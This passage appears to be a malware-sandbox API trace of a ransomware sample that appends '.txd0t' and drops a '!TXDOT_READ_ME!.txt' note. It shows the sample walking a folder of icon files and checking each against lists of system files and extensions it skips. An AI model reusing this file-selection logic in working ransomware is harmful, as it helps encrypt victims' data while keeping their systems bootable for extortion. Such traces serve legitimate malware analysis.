ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.726] StrCmpW (psz1="..", psz2=".") returned 1 [0071.726] StrCmpW (psz1="..", psz2="..") returned 0 [0071.726] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0071.726] StrCmpW (psz1="Print.ico", psz2=".") returned 1 [0071.726] StrCmpW (psz1="Print.ico", psz2="..") returned 1 [0071.726] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Print.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Print.ico" [0071.726] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0071.726] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.726] StrCmpIW (psz1="Print.ico", psz2="bootsect.bak") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="iconcache.db") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="thumbs.db") returned -1 [0071.727] StrCmpIW (psz1="Print.ico", psz2=" ransomware ") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2=" ransom ") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="debug.txt") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="boot.ini") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="desktop.ini") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="autorun.inf") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="ntuser.dat") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="ntldr") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="ntdetect.com") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="bootfont.bin") returned 1 [0071.727] StrCmpIW (psz1="Print.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.727] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0071.727] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.727] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0071.727] StrCmpW (psz1="Rotate1.ico", psz2=".") returned 1 [0071.727] StrCmpW (psz1="Rotate1.ico", psz2="..") returned 1 [0071.727] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.727] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.727] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate1.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" [0071.727] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0071.727] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.727] StrCmpIW (psz1="Rotate1.ico", psz2="bootsect.bak") returned 1 [0071.727] StrCmpIW (psz1="Rotate1.ico", psz2="iconcache.db") returned 1 [0071.727] StrCmpIW (psz1="Rotate1.ico", psz2="thumbs.db") returned -1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2=" ransomware ") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2=" ransom ") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="debug.txt") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="boot.ini") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="desktop.ini") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="autorun.inf") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="ntuser.dat") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="ntldr") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="ntdetect.com") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="bootfont.bin") returned 1 [0071.728] StrCmpIW (psz1="Rotate1.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.728] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0071.728] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.728] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0071.728] StrCmpW (psz1="Rotate2.ico", psz2=".") returned 1 [0071.728] StrCmpW (psz1="Rotate2.ico", psz2="..") returned 1 [0071.728] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.728] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate2.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" [0071.728] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0071.728] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="bootsect.bak") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="iconcache.db") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="thumbs.db") returned -1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2=" ransomware ") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2=" ransom ") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="debug.txt") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="boot.ini") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="desktop.ini") returned 1 [0071.728] StrCmpIW (psz1="Rotate2.ico", psz2="autorun.inf") returned 1 [0071.729] StrCmpIW (psz1="Rotate2.ico", psz2="ntuser.dat") returned 1 [0071.729] StrCmpIW (psz1="Rotate2.ico", psz2="ntldr") returned 1 [0071.729] StrCmpIW (psz1="Rotate2.ico", psz2="ntdetect.com") returned 1 [0071.729] StrCmpIW (psz1="Rotate2.ico", psz2="bootfont.bin") returned 1 [0071.729] StrCmpIW (psz1="Rotate2.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.729] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0071.729] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.729] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0071.729] StrCmpW (psz1="Rotate3.ico", psz2=".") returned 1 [0071.729] StrCmpW (psz1="Rotate3.ico", psz2="..") returned 1 [0071.729] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.729] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate3.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" [0071.729] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0071.729] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="bootsect.bak") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="iconcache.db") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="thumbs.db") returned -1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2=" ransomware ") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2=" ransom ") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="debug.txt") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="boot.ini") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="desktop.ini") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="autorun.inf") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="ntuser.dat") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="ntldr") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="ntdetect.com") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="bootfont.bin") returned 1 [0071.729] StrCmpIW (psz1="Rotate3.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.729] PathFindExtensionW (pszPath="Rotate3.ico") returned=".ico" [0071.729] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.729] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate4.ico", cAlternateFileName="")) returned 1 [0071.729] StrCmpW (psz1="Rotate4.ico", psz2=".") returned 1 [0071.729] StrCmpW (psz1="Rotate4.ico", psz2="..") returned 1 [0071.729] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate4.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate4.ico" [0071.730] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0071.730] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="bootsect.bak") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="iconcache.db") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="thumbs.db") returned -1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2=" ransomware ") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2=" ransom ") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="debug.txt") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="boot.ini") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="desktop.ini") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="autorun.inf") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="ntuser.dat") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="ntldr") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="ntdetect.com") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="bootfont.bin") returned 1 [0071.730] StrCmpIW (psz1="Rotate4.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.730] PathFindExtensionW (pszPath="Rotate4.ico") returned=".ico" [0071.730] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.730] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate5.ico", cAlternateFileName="")) returned 1 [0071.730] StrCmpW (psz1="Rotate5.ico", psz2=".") returned 1 [0071.730] StrCmpW (psz1="Rotate5.ico", psz2="..") returned 1 [0071.730] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate5.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" [0071.730] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0071.730] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2="bootsect.bak") returned 1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2="iconcache.db") returned 1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2="thumbs.db") returned -1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2=" ransomware ") returned 1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2=" ransom ") returned 1 [0071.730] StrCmpIW (psz1="Rotate5.ico", psz2="debug.txt") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="boot.ini") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="desktop.ini") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="autorun.inf") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="ntuser.dat") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="ntldr") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="ntdetect.com") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="bootfont.bin") returned 1 [0071.731] StrCmpIW (psz1="Rotate5.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.731] PathFindExtensionW (pszPath="Rotate5.ico") returned=".ico" [0071.731] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.731] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0071.731] StrCmpW (psz1="Rotate6.ico", psz2=".") returned 1 [0071.731] StrCmpW (psz1="Rotate6.ico", psz2="..") returned 1 [0071.731] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.731] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate6.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" [0071.731] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0071.731] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="bootsect.bak") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="iconcache.db") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="thumbs.db") returned -1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2=" ransomware ") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2=" ransom ") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="debug.txt") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="boot.ini") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="desktop.ini") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="autorun.inf") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="ntuser.dat") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="ntldr") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="ntdetect.com") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="bootfont.bin") returned 1 [0071.731] StrCmpIW (psz1="Rotate6.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.731] PathFindExtensionW (pszPath="Rotate6.ico") returned=".ico" [0071.731] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.731] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate7.ico", cAlternateFileName="")) returned 1 [0071.732] StrCmpW (psz1="Rotate7.ico", psz2=".") returned 1 [0071.732] StrCmpW (psz1="Rotate7.ico", psz2="..") returned 1 [0071.732] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0071.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate7.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" [0071.732] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0071.732] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="bootsect.bak") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="iconcache.db") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="thumbs.db") returned -1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2=" ransomware ") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2=" ransom ") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="debug.txt") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="boot.ini") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="desktop.ini") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="autorun.inf") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="ntuser.dat") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="ntldr") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="ntdetect.com") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="bootfont.bin") returned 1 [0071.732] StrCmpIW (psz1="Rotate7.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.732] PathFindExtensionW (pszPath="Rotate7.ico") returned=".ico" [0071.732] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.732] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate8.ico", cAlternateFileName="")) returned 1 [0071.732] StrCmpW (psz1="Rotate8.ico", psz2=".") returned 1 [0071.732] StrCmpW (psz1="Rotate8.ico", psz2="..") returned 1 [0071.732] StrCpyNW (in: psz1=0xecab68, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0071.732] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: 